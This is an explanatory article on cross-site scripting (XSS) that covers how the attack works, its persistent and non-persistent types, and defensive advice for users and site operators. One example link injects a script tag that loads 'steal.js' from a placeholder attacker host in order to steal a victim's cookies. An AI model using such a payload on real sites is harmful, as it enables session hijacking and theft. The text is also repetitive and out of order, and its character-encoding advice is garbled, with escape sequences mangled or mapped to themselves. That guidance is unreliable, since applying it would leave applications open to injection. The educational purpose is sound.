What is Cross Site Scripting ?
Cross Site Scripting is a technique that is used to inject malicious client side script into web pages that can be viewed by other viewers too. Cross site scripting is a very common type of attack on web applications which collects the data from the users.
Cross site scripting is referred as XSS.
Basically in XSS attack the attacker inserts the malicious code into link that appears to be from a trustworthy source.
But these links are the links that contains the malicious code to steal the cookie or for session hijacking. When Someone clicks on those links the embedded programming is submitted as part clients web request and execute on the user's computer this allows the attacker to steal/poison(alteration of the cookie) cookie or other information from the user's computer.
Most probably you have seen an link containing XSS malicious script in the various forums where different users are able to send messages to other members and in your mailbox too.
When Charlie click on this link he will directed towards the search for term "anything" on that website in the front end whereas on the back end steal.js will we working on the client computer stealing the information and sendeing it to the Mr.X server from there Mr.X will retrieve that information and use as he wants, he can also steal your cookie and save that cookie in his computer by using your cookie he can log on that website as Charlie.
While checking mails turn of the JavaScript so that no chance of executing of malicious script in the client side.
Click the link which are straight to a web address, most important it should not contain script tag with link. Most of the attacker encode the link in other format such as Hex or any other, remember that link you click should we very easy not containing extra tags, straight to web address.
If you are searching for information on a forum better use a search engine. Finding information on the search engine is more safe than searching it on the various forums.
This are things that you can do as client. But if you web application operator you can do more to stop XSS attack such as:
Never trust user Input always sanitize the user provided data.
Use of HTML sub sets tags such as in place of < , > use & l t and & g t and use also ( and ) by translating them to ( and ) , " to " , ' to ' , and also # and & by translating them to #(#) and & (&). This will help to reduce the options for attacker to introduce the malicious code. Majority of the cross site script attack will be eliminated.
By using the escaping and encoding we can create a major defense against cross site script attacks.
XSS holes are the most common type of security vulnerability, it is present from late 90's and getting popular in hackers day by day. Most of the major websites of the world has one or other type XSS vulnerabilities till 5 to 6 years back, most of the social networking sites also have some type XSS flaws in there site such as Facebook, Twitter, MySpace, You Tube. They all have contained XSS flaws in there website but now they are good or say safe but as you know every day cross site script (XSS) attacker try to find new way to get the information from the user by fooling him to click on link that he had created.
How the Cross Site Scripting (XSS) Attack Works
The working of the XSS attack is that usually the attacker inject JavaScript, VBScript, ActiveX, HTML, or Flash in a vulnerable application to fool a user to get data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible, and new uses of the malicious XSS found every now and then.Most probably you have seen an link containing XSS malicious script in the various forums where different users are able to send messages to other members and in your mailbox too.
Example of an XSS attack.
There Let there is a person named Charlie he used to visit a website regularly. One day Mr. X visits that website he finds out that this website is vulnerable to XSS attack. He creates a URL that contains malicious code in it. He sends this URL to other members by message or comment, link Ex http://website. com?q=anything < scr ipt src="http:/ / Mr.X website.com/steal.js">When Charlie click on this link he will directed towards the search for term "anything" on that website in the front end whereas on the back end steal.js will we working on the client computer stealing the information and sendeing it to the Mr.X server from there Mr.X will retrieve that information and use as he wants, he can also steal your cookie and save that cookie in his computer by using your cookie he can log on that website as Charlie.
Types of XSS attacks
There is no fixed type of attacks in Cross Site Scripting (XSS) because everyday new type of XSS attack pops out from nowhere. But according to some experts there are two types of Cross Site Scripting attacks: 1.Persistent 2.Non-PersistentPersistent
In Persistent Cross Site Scripting (XSS) vulnerability the data that is introduced by the attacker will be saved on the server and then permanently displayed on the pages that are generated from the server. A example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. This type of vulnerability is very dangerous because this vulnerability can be found on the social networking sites and using these sites it can propagate very fast.Non Persistent
and th The non persistent XSS vulnerability is the most common type vulnerability, most of the times this vulnerability is present in the websites where the websites accepts the data from the user, most commonly in the html forms and this data is immediately used by server side scripts to parse and display a page of result for the user, before proper sanitizing the data from user.How to reduce the Threat of XSS attack
To be safe from XSS attack follow the links you trust, that there is no chance of an cross site script attack.While checking mails turn of the JavaScript so that no chance of executing of malicious script in the client side.
Click the link which are straight to a web address, most important it should not contain script tag with link. Most of the attacker encode the link in other format such as Hex or any other, remember that link you click should we very easy not containing extra tags, straight to web address.
If you are searching for information on a forum better use a search engine. Finding information on the search engine is more safe than searching it on the various forums.
This are things that you can do as client. But if you web application operator you can do more to stop XSS attack such as:
Never trust user Input always sanitize the user provided data.
Use of HTML sub sets tags such as in place of < , > use & l t and & g t and use also ( and ) by translating them to ( and ) , " to " , ' to ' , and also # and & by translating them to #(#) and & (&). This will help to reduce the options for attacker to introduce the malicious code. Majority of the cross site script attack will be eliminated.
By using the escaping and encoding we can create a major defense against cross site script attacks.
XSS holes are the most common type of security vulnerability, it is present from late 90's and getting popular in hackers day by day. Most of the major websites of the world has one or other type XSS vulnerabilities till 5 to 6 years back, most of the social networking sites also have some type XSS flaws in there site such as Facebook, Twitter, MySpace, You Tube. They all have contained XSS flaws in there website but now they are good or say safe but as you know every day cross site script (XSS) attacker try to find new way to get the information from the user by fooling him to click on link that he had created.
